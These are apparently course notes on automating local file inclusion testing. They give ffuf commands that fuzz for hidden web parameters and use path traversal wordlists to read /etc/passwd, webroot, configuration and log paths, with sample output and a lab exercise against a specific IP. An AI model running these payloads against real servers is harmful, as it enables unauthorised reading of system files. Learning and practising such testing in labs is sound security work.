🍬Automation and Prevention

It's important to always fuzz a web app beceause the page may have other exposed parameters that are not linked to any HTML forms, and hence normal users would never access or unintentionally cause harm through.

fuzz the page for common GET parameters ->

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

And once we found a hidden param, we can do our LFI tests. A good wordlist is LFI-Jhaddix.txt, as it contains various bypasses and common files

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

With some output that would look like this:

..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd [Status: 200, Size: 3661, Words: 645, Lines: 91]
../../../../../../../../../../../../etc/hosts [Status: 200, Size: 2461, Words: 636, Lines: 72]
...SNIP...
../../../../etc/passwd  [Status: 200, Size: 3661, Words: 645, Lines: 91]

We must also try and fuzz for Server webroot path, server configurations file, and server logs.

we can fuzz for the index.php file through common webroot paths, which we can find in this wordlist for Linux or this wordlist for Windows. Depending on our LFI situation, we may need to add a few back directories (e.g. ../../../../), and then add our index.php afterwords.

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

and the output would be something like:

/var/www/html/          [Status: 200, Size: 0, Words: 1, Lines: 1]

To find server logs and configuration paths, we can use this wordlist for Linux or this wordlist for Windows

ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287

output:

<SNIP>
/etc/hosts              [Status: 200, Size: 2461, Words: 636, Lines: 72]
/etc/hostname           [Status: 200, Size: 2300, Words: 634, Lines: 66]
<SNIP>

The most common LFI tools are LFISuite, LFiFreak, and liffy.

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.53.113:55545/index.php?FUZZ=value' -fs 2309
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.53.113:55545/index.php?view=FUZZ' -fs 1935
PreviousRemote Code ExecutionNextSession Security

Last updated